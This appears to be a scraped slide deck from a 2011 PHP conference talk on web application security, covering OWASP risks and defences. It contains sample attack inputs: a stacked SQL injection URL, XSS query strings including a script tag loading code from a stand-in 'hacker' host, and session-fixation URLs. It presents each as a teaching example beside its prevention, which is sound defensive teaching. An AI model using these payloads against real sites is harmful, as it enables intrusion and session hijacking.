Phpnw security-20111009

Are you feeling secure – notes from the trenches Paul Lemon @anthonylime http://joind.in/3603

Introduction - I am a web developer and have been for 13 years - Former sound engineer to the obscure and poor - Technical Director at MadeByPi - I love what I do PHP / Java / Actionscript / Javascript / C# Wear a mean hairnet About me

“ The problem of insecure software is perhaps the most important technical challenge of our time.” – OWASP Testing Guide Introduction. Photo courtesy http://www.flickr.com/photos/katescars/

Introduction - Notes based on personal professional experience Over 20+ third party tests on our applications Development orientated Simple code examples – not production code. This presentation

Introduction Open Web Application Security Project Best resource for developers / analysts / testers https://www.owasp.org / OWASP

Introduction SQL Injection Cross-Site Scripting (XSS) Broken Authentication and Session Management Insecure Direct Object References Cross-Site Request Forgery (CSRF) Security Misconfiguration Insecure Cryptographic Storage Failure to Restrict URL Access Insufficient Transport Layer Protection Unvalidated Redirects and Forwards OWASP Top 10

SQL Injection http://www.flickr.com/photos/andresrueda/2983149263/

Injection http://xkcd.com/327/

Injection http://someserver/script.php?id=1;INSERT INTO members ('email','passwd','login_id','full_name')VALUES ('paul.lemon@gmail.com','hello',‘paul',’Paul Lemon'); Sample Code

Injection Confidential data can be disclosed The results of the query may not visible in the HTML Trial and error to iterate data in tables Execute long running queries Test for errors in page execution Vulnerable to inserts / updates / defacement How is it exploited

Injection Validation and Parameterised Query

Injection - Validate all input. Use PDO to create parameterised queries or Use a ORM or Database Library (not your own!) Set up your database permissions. Don’t expose your queries (logging etc) Code review Don’t be complacent How to prevent

Injection Validation is not just for the user’s benefit Cast to correct type i.e. intval / floatval / boolean Whitelist Input ranges - Reasonable minimums and maximums - Whitelist with regular expression - Blacklist with regular expression - Validate Email / Urls - Don’t rely on your model layer A quick note about validation

XSS http://www.flickr.com/photos/andresrueda/2983149263/

XSS http://someserver/script.php?name=<script>alert();</script> or http://bit.ly/lYMcHjkj Sample XSS

XSS http:// host/script.php?name=<script src='http://hacker/script.js' /> Sample XSS

XSS Potential Exploits - Theft of session cookies - Insertion of content / forms etc - Redirection to malicious sites - Insertion of trojan downloads / keyloggers etc.

XSS Varieties of XSS Persistent - data is stored in the database Nonpersistent - injected code is present in the URL/Request DOM Based - javascript executed in the page reads the request

XSS Trusted Not Trusted Posted Form Querystring Url Cookies HTTP Headers Web application Browser

XSS – Trust zones Trusted Not Trusted API Use HTTPS Treat as user input Web application

XSS – Trust zones Trusted Not Trusted Database Database may have been compromised Validation may have failed Escape all output Web application

XSS – Trust zones Trusted Not Trusted API Database Web application Browser

XSS – Trust zones Trusted Not Trusted API Database Your application should be modular too Web application Browser

XSS Escape all output ENT_QUOTES option is important – double and single quotes Page encoding is important If you need HTML output use HTML Purifier

XSS Escape all output – context is important

XSS ?name=<script>alert("hello");</script>& link=javascript:alert('hello') Escape all output – context is important

XSS Check your templating engine for XSS protection (options in Symfony 1/ Twig for escaping by default) Context is important to the escaping used - Image and Hyperlinks - Javascript blocks - CSS There is not a definitive solution for PHP https://www.owasp.org/index.php/ESAPI#tab=PHP  Preventing XSS

XSS Session cookie to use HTTPOnly in php.ini Or use PHP function session_set_cookie_params Cookies set as HTTPOnly

Session Exploits Session Fixation Man in the middle attacks Overview

Session Exploits Allowing the session id to be passed on the querystring Url is sent via email to potential victim visit this url to the site http://localhost/?sessionid=1234 Victim logs in and this is attached to the session id Sender uses the original session id and gains access http://localhost/viewprofile?sessionid=1234 Session Fixation

Session Exploits Do not allow session id to be passed on the querystring Session Fixation – How to prevent

Session Exploits Where the attacker has access to the machine - First user notes down the session id on the computer - Second user logs in and this is attached to the session id - First user uses the original session id and gains access Session Fixation

Session Exploits Roll the session id when a user logs in You can change the session id more frequently… Session Fixation – How to prevent

Session Exploits Man in the middle attacks User logs in… Session Id - Cookie HTTP POST Web application Username / Password

Session Exploits Man in the middle attacks User logs in… Session Id - Cookie HTTP POST Ahoy! Web application Username / Password

Session Exploits Man in the middle attacks Username / Password User logs in… Session Id - Cookie HTTP S POST Web application

Session Exploits - Login and authentication must always be over HTTPS Passwords are personal and confidential Users are not disciplined (Store your passwords securely SHA1 / Salt ) Man in the middle attacks

Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Session Id - Cookie Web application Username / Password User logs in… Session Id - Cookie HTTP S POST Web application

Session Exploits Authenticated session cookies should be delivered over SSL Use HTTPS only option on session cookie Use a separate domain if you can e.g. https://admin.yoursite/ Use a separate path for your session cookie Man in the middle attacks

Session Exploits Man in the middle attacks

Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Web application Username / Password User logs in… Session Id - Cookie HTTP S POST Web application

Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Curses! Web application Username / Password User logs in… Session Id - Cookie HTTP S POST Web application

Session Exploits Man in the middle attacks Sometimes you cannot limit session to HTTPS Users can log in and see non-secure data in public pages There are still secure areas of the site Use two cookies Or make the user login again

Session Exploits Username / Password User logs in… Session Id – Cookie SECURE HTTP S POST Open Zone of Web application User visits a non-secure page Resource downloaded HTTP GET Session Id Extra Auth – Cookie SECURE Web application

Session Exploits Username / Password User logs in… Session Id – Cookie SECURE HTTP S POST Secure Zone of Web application User visits a non-secure page Response HTTP S GET/POST/PUT Session Id Extra Auth – Cookie SECURE Extra Auth – Cookie Web application

Conclusions Get someone else to do the work

Conclusions Use a framework. I like symfony. Use a well supported platform / CMS Check their response to security issues If there is no solution – check again (and again) Get someone else to do the work

Conclusions - Expect there to be faults – test as much as you can. Expect there to be attacks – monitor your site Stay on top of your versions – PHP / MySQL etc Input validation is critical Code for quality / Unit tests / regression Code review Operate with least privilege Establish a build and deployment script Read OWASP Recommendations

XSS cheatlist: http://ha.ckers.org/xss.html OWASP: https://www.owasp.org/index.php/Main_Page HTML Purifier: http://htmlpurifier.org/ Context aware templates: http://googleonlinesecurity.blogspot.com/2009/03/reducing-xss-by-way-of-automatic.html MadeByPi: http://www.madebypi.co.uk Conclusions Resources

Are you feeling secure – notes from the trenches Paul Lemon @anthonylime – paul.lemon@gmail.com http://joind.in/3603

Phpnw security-20111009

More Related Content

What's hot (20)

Viewers also liked (19)

Similar to Phpnw security-20111009 (20)

Recently uploaded (20)

Phpnw security-20111009

Editor's Notes